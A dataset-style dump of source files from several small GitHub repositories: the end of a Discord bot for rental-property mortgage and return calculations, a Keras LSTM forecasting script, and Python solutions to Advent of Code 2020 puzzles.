case_insensitive(m)\n\tif m.content == 'y' or m.content == 'n' or m.content == 'yes' or m.content == 'no' or m.content =='quit':\n\t\treturn True\n\telse:\n\t\treturn False\ndef zipCodeCheck(m):\n\tif m.content.isdigit() and len(m.content)==5:\n\t\treturn True\n\telse:\n\t\treturn False\n\t\t\ndef notBot(m):\n\tif m.author == bot.user:\n\t\treturn False\n\telse:\n\t\treturn True\nasync def percWait(ctx):\n\ttry:\n\t\tpercent = await bot.wait_for('message', check=percCheck, timeout=30)\n\t\tif percent.content.isdigit():\n\t\t\tpercent = float(int(percent.content))\n\t\t\treturn percent\n\t\telif percent.content[-1] == \"%\":\n\t\t\tpercent = float(percent.content[:-1])\n\t\t\treturn percent\n\t\telif percent.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn 'quit'\n\t\telse:\n\t\t\tpercent = float(percent.content)\n\t\t\treturn percent\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn 'quit'\n\n\[email protected]\nasync def on_message(message):\n\tif message.author == bot.user:\n\t\treturn\n\tawait bot.process_commands(message)\n\n\[email protected](aliases=['c'])\nasync def calculate(ctx, message=None, validPercent=False,PMI=False):\n\tawait ctx.send('Developed by Rye#9601, a college student, real estate enthusiast, and future investor. 
Gladly taking comments, questions, or suggestions!')\n\tawait ctx.send('Type \\\"quit\\\" at any time to quit the calculator.')\n\tawait ctx.send('Use default property percentages? (20% down payment, 3% interest)')\n\ttry:\n\t\tdefault = await bot.wait_for('message',check = booleanCheck,timeout=30)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tdefault.content = case_insensitive(default)\n\tif default.content == 'quit':\n\t\tawait ctx.send('Quitting calculator program.')\n\t\treturn\n\tif default.content == 'y' or default.content == 'yes':\n\t\tdefault = True\n\t\tawait ctx.send('Using default percentages.')\n\telse:\n\t\tdefault = False\n\t\tawait ctx.send('Overwriting default property percentages.')\n\tawait ctx.send('Use default expense percentages? (1% PMI, 4% closing costs, 5% vacancy, 7% CapEx & repairs)')\n\ttry:\n\t\texpenseDefault = await bot.wait_for('message', check=booleanCheck, timeout=30)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\texpenseDefault.content = case_insensitive(expenseDefault)\n\tif expenseDefault.content == 'quit':\n\t\tawait ctx.send('Quitting calculator program.')\n\t\treturn\n\tif expenseDefault.content == 'y' or expenseDefault.content == 'yes':\n\t\texpenseDefault = True\n\t\tawait ctx.send('Using default expense percentages.')\n\telse:\n\t\texpenseDefault = False\n\t\tawait ctx.send('Overwriting default expense percentages.')\n\tawait ctx.send('Enter property value:')\n\ttry:\n\t\tvalue = await bot.wait_for('message',check=check,timeout=30)\n\t\tif value.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn\n\t\telse:\n\t\t\tvalue = int(value.content)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tawait ctx.send('Property value has been set to **${:,d}**'.format(value))\n\twhile not validPercent:\n\t\tif default:\n\t\t\tdownPayment = 20\n\t\t\tvalidPercent = True\n\t\t\tawait ctx.send('Assuming 20% down payment.')\n\t\telse:\n\t\t\tawait ctx.send('Enter down payment percentage:')\n\t\t\tdownPayment = await percWait(ctx)\n\t\t\tif downPayment == 'quit':\n\t\t\t\treturn\n\t\t\tif downPayment <0 or downPayment > 100:\n\t\t\t\tawait ctx.send('Enter a valid percentage between 0 to 100. Try again.')\n\t\t\telif 0 <= downPayment <= 100:\n\t\t\t\tvalidPercent = True\n\tawait ctx.send('Down payment percentage has been set to **{:.2f}%**'.format(downPayment))\n\tif default == True:\n\t\tawait ctx.send('Assuming interest rate of 3%')\n\t\tintRate = 3\n\telse:\n\t\tawait ctx.send('Enter interest rate:')\n\t\tintRate = await percWait(ctx)\n\t\tif intRate == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Interest rate has been set to **{:.2f}%**'.format(intRate))\n\tawait ctx.send('Enter an estimate of expected rent payments:')\n\ttry:\n\t\trent = await bot.wait_for('message',check=check,timeout=30)\n\t\tif rent.content == 'quit':\n\t\t\tawait ctx.send('Quitting calculator program.')\n\t\t\treturn\n\t\telse:\n\t\t\trent = int(rent.content)\n\texcept asyncio.TimeoutError:\n\t\tawait ctx.send('You took too long! Program terminated.')\n\t\treturn\n\tawait ctx.send('Rent has been set to **${:,d}**'.format(rent))\n\tif downPayment<20:\n\t\tif expenseDefault == True:\n\t\t\tawait ctx.send('Down payment is lower than 20%. PMI is required. 1% PMI is assumed.')\n\t\t\tPMI = True\n\t\t\tPMIPerc = 1\n\t\telse:\n\t\t\tawait ctx.send('Down payment is lower than 20%. 
PMI is required. Enter PMI percentage.')\n\t\t\tPMI = True\n\t\t\tPMIPerc = await percWait(ctx)\n\t\t\tif PMIPerc == 'quit':\n\t\t\t\treturn\n\t\t\tawait ctx.send('PMI has been set to **{:.2f}%**'.format(PMIPerc))\n\tif expenseDefault:\n\t\tawait ctx.send('Assuming 4% closing costs.')\n\t\tclosingCost = 4\n\t\tawait ctx.send('Assuming 5% vacancy.')\n\t\tvacancy = 5\n\t\tawait ctx.send('Assuming 7% CapEx.')\n\t\tcapEx = 7\n\t\tawait ctx.send('Assuming 7% repairs.')\n\t\trepairs = 7\n\telse:\n\t\tawait ctx.send('Enter vacancy rate:')\n\t\tvacancy = await percWait(ctx)\n\t\tif vacancy == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Vacancy has been set to **{:.2f}%**'.format(vacancy))\n\t\tawait ctx.send('Enter CapEx rate:')\n\t\tcapEx = await percWait(ctx)\n\t\tif capEx == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Capital expenditures has been set to **{:.2f}%**'.format(capEx))\n\t\tawait ctx.send('Enter repairs percentage:')\n\t\trepairs = await percWait(ctx)\n\t\tif repairs == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Repairs has been set to **{:.2f}%**'.format(repairs))\n\t\tawait ctx.send('Enter closing cost percentage:')\n\t\tclosingCost = await percWait(ctx)\n\t\tif closingCost == 'quit':\n\t\t\treturn\n\t\tawait ctx.send('Closing cost percentage has been set to **{:.2f}%**'.format(closingCost))\n\tawait ctx.send('Calculating... Because of the Discord messaging delay this may take a while. Please be patient.')\n\tawait ctx.send('\\u200B')\n\tawait ctx.send('**__Calculations__**')\n\tdownPayment /= 100\n\tclosingCost /= 100\n\tintRate /= 100\n\tvacancy /= 100\n\tcapEx /= 100\n\trepairs /= 100\n\tmonthly = round((((1-downPayment)*value)*((intRate/12)*(1+(intRate/12))**360/((1+(intRate/12))**360-1))),2)\n\tawait ctx.send('With a 30-year ${:,d} mortgage at an interest rate of **{:.2f}%**, you will be paying **${:,d} every month**, '\n\t 'totalling **${:,d}** over the life of the mortgage.'\n\t .format(round((1-downPayment)*value),intRate*100,round(monthly), round(monthly*360)))\n\tawait ctx.send('**Down Payment**({:.2f}%) : *${:,d}*'.format(downPayment * 100, round(value * downPayment)))\n\tawait ctx.send('**Closing Costs**({:.2f}%) : *${:,d}*'.format(closingCost * 100, round(value * closingCost)))\n\tawait ctx.send('**Rent**: *${:,d}*'.format(rent))\n\tawait ctx.send('\\u200B')\n\tawait ctx.send('**__Monthly Expenses__**')\n\tawait ctx.send('**Vacancy**({:.2f}%) : *${:,d}*'.format(vacancy * 100, round(rent * vacancy)))\n\tawait ctx.send('**Capital Expenditures**({:.2f}%) : *${:,d}*'.format(capEx * 100, round(rent * capEx)))\n\tawait ctx.send('**Repairs**({:.2f}%) : *${:,d}*'.format(repairs * 100, round(rent * repairs)))\n\tif PMI == True:\n\t\tPMIPerc /= 100\n\t\tPMIList = amort((1-downPayment)*value,(.20*value)-(downPayment*value),0, 0, intRate, monthly, PMIPerc*((1-downPayment)*value), 0, 0)\n\t\tPMIAmount = PMIList[1]\n\t\tif PMIList[2] == 1:\n\t\t\tawait ctx.send('**PMI Value**({:.2f}%) : {:d} payment of *${:,d}/mo* for a total of *${:,d}*'.format(PMIPerc * 100, PMIList[2], round(PMIList[1]), round(PMIList[0])))\n\t\telse:\n\t\t\tawait ctx.send('**PMI Value**({:.2f}%) : {:d} payments of *${:,d}/mo* for a total of *${:,d}*'.format(PMIPerc * 100, PMIList[2], round(PMIAmount),round(PMIList[0])))\n\trepairAmount = round(rent * repairs)\n\tcapExAmount = round(rent * capEx)\n\tvacancyAmount = round(rent * vacancy)\n\tif PMI == True:\n\t\tmonthlyExpenses = monthly + repairAmount + capExAmount + vacancyAmount + PMIList[1]\n\telse:\n\t\tmonthlyExpenses = monthly + repairAmount + capExAmount + 
vacancyAmount\n\tawait ctx.send('**Total** : *${:,d}*'.format(round(monthlyExpenses)))\n\tawait ctx.send('\\u200B')\n\tawait ctx.send('**__Investment Calculations__**')\n\tawait ctx.send('**Net Operating Income** : *${:,d}*'.format(round(rent-monthlyExpenses)))\n\tawait ctx.send('**Cash on Cash Return** : *{:.3f}%*'.format(100*(((rent*12)-(monthlyExpenses*12))/((value*downPayment)+(value*closingCost)))))\n\tawait ctx.send('**Cap Rate** : *{:.3f}%*'.format(100*(((rent*12)-(monthlyExpenses*12))/value)))\n\tawait ctx.send('\\u200B')\n\t\n\n\n\n\n\nbot.run(TOKEN)\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.7395833134651184, "avg_line_length": 18.399999618530273, "blob_id": "7fd4a35ff48e44c32d3d9f3347de839bec5bf95a", "content_id": "7bc8247509de80f74a704e09da5a9630120e6573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 96, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/requirements.txt", "repo_name": "RyanNDao/Public-RE-Bot", "src_encoding": "UTF-8", "text": "git+https://github.com/Rapptz/discord.py\nasync-timeout==3.0.1\ndnspython==1.16.0\n\npymongo~=3.11.0" } ]
2
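The bot above inlines the standard fixed-rate amortization formula when computing the monthly payment. Here it is factored into a named helper with a worked call; the function name and the sample figures are illustrative, not from the repo:

    def monthly_payment(principal, annual_rate, n_months=360):
        # P * r(1+r)^n / ((1+r)^n - 1), with r the monthly rate;
        # the same expression the calculate() command builds inline
        r = annual_rate / 12
        return principal * (r * (1 + r) ** n_months) / ((1 + r) ** n_months - 1)

    # e.g. a $200,000 property with the bot's defaults (20% down, 3% interest):
    print(round(monthly_payment(160_000, 0.03), 2))  # ~674.57 per month for 30 years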
edvanjr/aula_lstm
https://github.com/edvanjr/aula_lstm
e532864dc8c4646e3a86b4bc881c449cf02bd96b
7e01373402f3a8f1015009e90c146eaa8c4ee523
12e2c086df447e19529c0986876b95673e9b6396
refs/heads/master
2020-05-14T06:12:21.532523
2019-04-16T14:23:57
2019-04-16T14:23:57
181,705,074
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6194865107536316, "alphanum_fraction": 0.6431863307952881, "avg_line_length": 26.14285659790039, "blob_id": "983dcbb7220dcb6c2e0d71361ea88561e3bc76ab", "content_id": "0d430674bcc8a471c1a817e98ec67878749d6d54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1519, "license_type": "no_license", "max_line_length": 79, "num_lines": 56, "path": "/aula_lstm.py", "repo_name": "edvanjr/aula_lstm", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 16 10:40:26 2019\n\n@author: Edvan Soares\n\"\"\"\n\nimport numpy as np\nfrom pandas import read_csv\nfrom keras.models import Sequential\nfrom keras.layers import LSTM\nfrom keras.layers import Dense\n\ndef split_sequence(sequence, n_steps):\n\tX, y = list(), list()\n\tfor i in range(len(sequence)):\n\t\tend_ix = i + n_steps\n\t\tif end_ix > len(sequence)-1:\n\t\t\tbreak\n\t\tseq_x, seq_y = sequence[i:end_ix], sequence[end_ix]\n\t\tX.append(seq_x)\n\t\ty.append(seq_y)\n\treturn np.array(X), np.array(y)\n\ndef split_train_test_data(X, y, n_test):\n return X[:-n_test], y[:-n_test], X[-n_test:], y[-n_test:]\n\ndef mape(y_true, y_pred):\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return round(np.mean(np.abs((y_true - y_pred) / y_true)) * 100, 2)\n\ndef fit_model_lstm(X, y):\n model = Sequential()\n model.add(LSTM(100, activation='relu', input_shape=(n_steps, n_features)))\n model.add(Dense(1))\n model.compile(optimizer='adam', loss='mse')\n model.fit(X, y, epochs=2000, verbose=0)\n return model\n\ndata = read_csv(open('data.csv', 'r'), sep='\\t', header=0).values.T.tolist()[0]\n\nn_steps = 3\nn_features = 1\nX, y = split_sequence(data, n_steps)\nX = X.reshape((X.shape[0], X.shape[1], n_features))\nX_train, y_train, X_test, y_test = split_train_test_data(X, y, 6)\n\nmodel = fit_model_lstm(X_train, y_train)\npredicted = []\n\nfor x in X_test:\n test = x.reshape((1, n_steps, n_features))\n yhat = model.predict(test, verbose=0)\n predicted.append(yhat)\n\nprint(mape(y_test, predicted))" } ]
1
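The split_sequence helper in aula_lstm.py is the piece that turns a flat series into supervised (window, next value) pairs for the LSTM. A quick check of its behavior on a made-up series:

    import numpy as np

    def split_sequence(sequence, n_steps):
        # identical logic to the repo's helper: each window of n_steps
        # values is paired with the value that immediately follows it
        X, y = list(), list()
        for i in range(len(sequence)):
            end_ix = i + n_steps
            if end_ix > len(sequence) - 1:
                break
            X.append(sequence[i:end_ix])
            y.append(sequence[end_ix])
        return np.array(X), np.array(y)

    X, y = split_sequence([10, 20, 30, 40, 50], n_steps=3)
    print(X.tolist())  # [[10, 20, 30], [20, 30, 40]]
    print(y.tolist())  # [40, 50]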
wszlosek/Advent-Of-Code-2020
https://github.com/wszlosek/Advent-Of-Code-2020
a5b2eea044d8f0811f58e0d87544d96dd41f77b3
fc54f5daa371d8c400303637d7edbe4e9c91dfbc
152f0fce7fea68334265df7b48c185682c62cb82
refs/heads/main
2023-02-02T08:35:53.584487
2020-12-22T15:40:58
2020-12-22T15:40:58
320,402,298
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4275229275226593, "alphanum_fraction": 0.4532110095024109, "avg_line_length": 20, "blob_id": "ca87bd15e5ad8f2e0aec178bbbdd96aef6aff1e4", "content_id": "abfc79e4016ccd0f2cd5a4993c627970f71bf0ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/Day 1/day1.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n for a in lines:\n for b in lines:\n if (int(a) + int(b) == 2020):\n return (int(a) * int(b))\n\n\ndef part2(lines):\n for a in lines:\n for b in lines:\n for c in lines:\n if(int(a) + int(b) + int(c) == 2020):\n return (int(a) * int(b) * int(c))\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.406862735748291, "alphanum_fraction": 0.4346405267715454, "avg_line_length": 18.44444465637207, "blob_id": "9c5fe4d33a361bc9ea542023c4c9f56b6e0527a8", "content_id": "c4ac94072852e3e066aa70afcc23849019191b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1224, "license_type": "no_license", "max_line_length": 51, "num_lines": 63, "path": "/Day 5/day5.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def bin(line, length, left, right, par1, par2):\n low = 0\n high = length\n i = 0\n\n while i < len(line):\n mid = (high + low) // 2\n\n if line[i] == left:\n high = mid - 1\n\n elif line[i] == right:\n low = mid + 1\n\n elif (line[i] != par1 and line[i] != par2):\n break\n\n i += 1\n\n return mid + 1\n\ndef part1(lines):\n id = 0\n\n for l in lines:\n row = bin(l, 127, 'F', 'B', 'L', 'R')\n column = bin(l, 7, 'L', 'R', 'F', 'B')\n if(row * 8 + column > id):\n id = row * 8 + column\n\n return id\n\n\ndef part2(lines):\n data = []\n out = []\n\n for l in lines:\n row = bin(l, 127, 'F', 'B', 'L', 'R')\n column = bin(l, 7, 'L', 'R', 'F', 'B')\n id = 8 * row + column\n data.append(id)\n\n allSeat = set(range(min(data), max(data)))\n\n for i in allSeat:\n if not(i in data):\n out.append(i)\n\n for i in range(0, len(out)-1):\n if(out[i] + 8 != out[i+1]):\n return out[i+1]\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4433249235153198, "alphanum_fraction": 0.45759865641593933, "avg_line_length": 17.060606002807617, "blob_id": "f7aee5cc42e7369d7f234d1bdf3320ba7519cd87", "content_id": "23f3ea6d3de04e8057edb5c9e8cb4c37cdf52ea4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 57, "num_lines": 66, "path": "/Day 6/day6.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def commonCharacters(strings, n):\n MAX_CHAR = 26\n prim = [True] * MAX_CHAR\n l = 0\n\n for i in range(n):\n sec = [False] * MAX_CHAR\n\n for j in range(len(strings[i])):\n if (prim[ord(strings[i][j]) - ord('a')]):\n sec[ord(strings[i][j]) - ord('a')] = True\n\n for i in range(MAX_CHAR):\n prim[i] = sec[i]\n\n for i in range(26):\n if (prim[i]):\n l += 1\n\n return l\n\n\ndef part1(sentences):\n sum = 0\n\n for i in sentences:\n sum += len(i)\n\n return 
sum\n\n\ndef part2(lines):\n arr = []\n p2 = 0\n\n for l in lines:\n if l != \"\":\n arr.append(l)\n else:\n p2 += commonCharacters(arr, len(arr))\n arr.clear()\n\n return p2\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n')\n\n sentence = \"\"\n sentences = []\n\n for l in lines:\n if l != \"\":\n sentence += l\n else:\n sentence = \"\".join(set(sentence))\n sentences.append(sentence)\n sentence = \"\"\n\n print(f\"Part 1: {part1(sentences)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3485533595085144, "alphanum_fraction": 0.40189874172210693, "avg_line_length": 20.69607925415039, "blob_id": "3db873e5bea21803d1073dffdc676806317cdc79", "content_id": "3d666f6dcaac74fbd8c1d6d50af43d98f73acca7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2212, "license_type": "no_license", "max_line_length": 84, "num_lines": 102, "path": "/Day 4/day4.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def req(sentence, data):\n p = 0\n\n for d in data:\n if(sentence.count(d)):\n p += 1\n\n if(p == len(data)):\n return True\n return False\n\n\ndef findInArr(array, temp):\n for i in range(len(array)):\n if(array[i].find(temp) != -1):\n return i\n\n\ndef hcl(sentence):\n ch = ['0', '1', '2', '3', '4', '5', '6', '7', '8',\n '9', 'a', 'b', 'c', 'd', 'e', 'f']\n\n for i in sentence:\n if(not(i in ch)):\n return False\n return True\n\n\ndef ecl(sentence):\n ch = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\n if(len(sentence) == 3 and sentence in ch):\n return True\n return False\n\n\ndef part1(lines, data):\n p1 = 0\n\n for l in lines:\n if(req(l, data)):\n p1 += 1\n\n return p1\n\n\ndef part2(lines, data):\n\n p2 = 0\n for l in lines:\n o = 0\n l = l.replace('\\n', ' ')\n\n if(req(l, data)):\n sp = l.split()\n data2 = [findInArr(sp, data[0]), findInArr(sp, data[1]),\n findInArr(sp, data[2]), findInArr(sp, data[3]),\n findInArr(sp, data[4]), findInArr(sp, data[5]),\n findInArr(sp, data[6])]\n\n if(1920 <= int(sp[data2[0]][4:]) <= 2002):\n o += 1\n\n if(2010 <= int(sp[data2[1]][4:]) <= 2020):\n o += 1\n\n if (2020 <= int(sp[data2[2]][4:]) <= 2030):\n o += 1\n\n if(sp[data2[3]][-2:] == \"cm\" and 150 <= int(sp[data2[3]][4:-2]) <= 193):\n o += 1\n if (sp[data2[3]][-2:] == \"in\" and 59 <= int(sp[data2[3]][4:-2]) <= 76):\n o += 1\n\n if(sp[data2[4]][4] == \"#\" and hcl(sp[data2[4]][5:])):\n o += 1\n\n if(ecl(sp[data2[5]][4:])):\n o += 1\n\n if (len(sp[data2[6]]) == 13):\n o += 1\n\n\n if(o == 7):\n p2 += 1\n\n return p2\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n\\n')\n\n data = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n \n print(f\"Part 1: {part1(lines, data)}\")\n print(f\"Part 2: {part2(lines, data)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4328824281692505, "alphanum_fraction": 0.4609781503677368, "avg_line_length": 18.632652282714844, "blob_id": "357b4b8ea20444a3e375137067f1192492f7d6cd", "content_id": "84beec717c56a542aee0a5875f87bb86c9b2180e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 961, "license_type": "no_license", "max_line_length": 64, "num_lines": 49, "path": "/Day 9/day9.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n for i in range(26, len(lines)):\n hLines = lines[i-25:i]\n sums = []\n\n for l1 in range(25):\n for 
l2 in range(25):\n if l1 != l2:\n sums.append(int(hLines[l1])+int(hLines[l2]))\n\n if (int(lines[i]) not in sums):\n return lines[i]\n\n sums.clear()\n\n\ndef part2(lines):\n x = int(part1(lines))\n n = len(lines)\n res = int(lines[0])\n start = 0\n\n for i in range(1, n+1):\n\n while(res > x and start < i-1):\n res -= int(lines[start])\n start += 1\n\n if res == x:\n break\n\n if i < n:\n res += int(lines[i])\n\n arr = [int(lines[l]) for l in range(start, i)]\n\n return (min(arr) + max(arr))\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\", end=\"\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3786008358001709, "alphanum_fraction": 0.4156378507614136, "avg_line_length": 17.25, "blob_id": "75440cdcdaa8cf018cc092f0b2e81c84468b83e4", "content_id": "f3664caae8a0074920325d9bacc00306405325a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 54, "num_lines": 40, "path": "/Day 2/day2.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(s, a, b, char):\n z = s[3].count(char)\n\n if(z >= a and z <= b):\n return True\n return False\n\n\ndef part2(s, a, b, char):\n if((char == s[3][a] and char != s[3][b])\n or (char != s[3][a] and char == s[3][b])):\n return True\n return False\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().splitlines()\n\n p1 = 0\n p2 = 0\n\n for l in lines:\n s = l.replace(\"-\", \" \").split(\" \")\n\n char = s[2][0]\n a = int(s[0])\n b = int(s[1])\n\n if(part1(s, a, b, char)):\n p1 += 1\n if (part2(s, a-1, b-1, char)):\n p2 += 1\n\n print(f\"Part 1: {p1}\")\n print(f\"Part 2: {p2}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.44108107686042786, "alphanum_fraction": 0.4681081175804138, "avg_line_length": 16.80769157409668, "blob_id": "3e8bbd26d88cba330afc20ff1b28761ce1c95c7b", "content_id": "5465f416d7b866f55fb7c07c4ed46b74c453f310", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 925, "license_type": "no_license", "max_line_length": 66, "num_lines": 52, "path": "/Day 7/day7.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "import re\n\ndef shinyGold(g, graph):\n if g == \"shiny gold\":\n return True\n\n elif g != \"\":\n return any(shinyGold(next, graph) for i, next in graph[g])\n\n return False\n\n\ndef part1(graph):\n p1 = 0\n\n for g in graph.keys():\n if(shinyGold(g, graph)):\n p1 += 1\n\n return p1 - 1\n\n\ndef part2(g, graph):\n if g == \"\":\n return 1\n\n return sum(int(i) * part2(next, graph)\n for i, next in graph[g]) + 1\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n graph = {}\n for l in lines:\n regex = re.match('(.+?) bags', l)\n c1 = regex.group(1)\n c2 = re.findall('(\\d+) (.+?) 
bag', l)\n\n if len(c2) > 0:\n graph[c1] = c2\n else:\n graph[c1] = [('0', '')]\n\n\n print(f\"Part 1: {part1(graph)}\")\n print(f\"Part 2: {part2('shiny gold', graph) - 1}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3884514570236206, "alphanum_fraction": 0.43044620752334595, "avg_line_length": 15.234042167663574, "blob_id": "d569eefee68b3e7f5dbb80e670da4403571047dc", "content_id": "b9b384e7ef5a0d508fb91a0a244903fd8879d58e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 36, "num_lines": 47, "path": "/Day 10/day10.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n o1 = 1\n o3 = 0\n\n for l in lines:\n\n if (l == lines[-1]):\n o3 += 1\n break\n\n if (l+1 in lines):\n o1 += 1\n\n elif (l+3 in lines):\n o3 += 1\n\n return (o1 * o3)\n\n\ndef part2(lines):\n lines.append(lines[-1]+3)\n sof = {0:1}\n\n for l in lines:\n sof[l] = sof.get(l-3, 0) \\\n + sof.get(l-2, 0) \\\n + sof.get(l-1, 0)\n\n\n return sof[lines[-1]]\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.read().split('\\n')\n\n for l in range(len(lines)):\n lines[l] = int(lines[l])\n\n lines = sorted(lines)\n\n print(f\"Part 1: {part1(lines)}\")\n print(f\"Part 2: {part2(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4121405780315399, "alphanum_fraction": 0.4329073429107666, "avg_line_length": 23.096153259277344, "blob_id": "ccc6af4473c5822d5b7e072cdb70cc0cdeca7837", "content_id": "102de211dcbc8a4167befe43e67d4a2b60cbed57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/Day 11/day11.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "from copy import deepcopy\nfrom itertools import chain\n\ndef adj(adjrows, i):\n return list(chain(*[[ x[i] for i in range(i-1, i+2) ] for x in adjrows ]))\n\n\ndef part1(lines):\n l1 = deepcopy(lines)\n d = 0\n rows = [None, ['.' for x in range(len(lines[0]))] + ['.'], lines[0] + ['.']]\n\n for j in range(len(lines)):\n rows.pop(0)\n rows.append(lines[j+1] + ['.']) \\\n if j+1 in range(len(lines)) \\\n else rows.append(['.' 
for i in range(len(lines[0]))] + ['.'])\n\n for i in range(len(lines[0])):\n cell = lines[j][i]\n\n if cell == \"#\":\n adjm = adj(rows, i).count('#') - 1\n if adjm > 3:\n l1[j][i] = 'L'\n d += 1\n\n elif cell == \"L\":\n adjm = adj(rows, i).count('#')\n if adjm == 0:\n l1[j][i] = '#'\n d += 1\n\n if d > 0:\n return part1(l1)\n\n return lines\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = [list(x) for x in f.read().replace('L', '#').splitlines()]\n\n count = []\n [count.append(x.count('#')) for x in part1(lines)]\n p1 = sum(count)\n\n print(f\"Part 1: {p1}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.37806639075279236, "alphanum_fraction": 0.3953824043273926, "avg_line_length": 15.139534950256348, "blob_id": "99acd9491f81d25dd5b0bf323be307eaafbcbbbb", "content_id": "849e23623ff51e0a193d3b56ed7b7874e9c9350f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 693, "license_type": "no_license", "max_line_length": 37, "num_lines": 43, "path": "/Day 8/day8.py", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "def part1(lines):\n acc = 0\n i = 0\n iS = []\n\n while True:\n instruction = lines[i][0:3]\n\n if i in iS:\n break\n else:\n iS.append(i)\n\n if lines[i][4] == \"-\":\n value = int(lines[i][4:])\n else:\n value = int(lines[i][5:])\n\n if instruction == \"acc\":\n acc += value\n i += 1\n\n elif instruction == \"jmp\":\n i += value\n\n else:\n i += 1\n\n if i >= len(lines):\n break\n\n return acc\n\n\ndef main():\n with open(\"input.txt\") as f:\n lines = f.readlines()\n\n print(f\"Part 1: {part1(lines)}\")\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.770370364189148, "avg_line_length": 21.5, "blob_id": "7a08c52c28578ed48b5d7fd8a5e20c45a9cc7c57", "content_id": "dfe973fba3cd39b7fe4edcb6433838802f782c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/README.md", "repo_name": "wszlosek/Advent-Of-Code-2020", "src_encoding": "UTF-8", "text": "# Advent Of Code 2020\n\nSome of my puzzle solutions from Advent Of Code. 
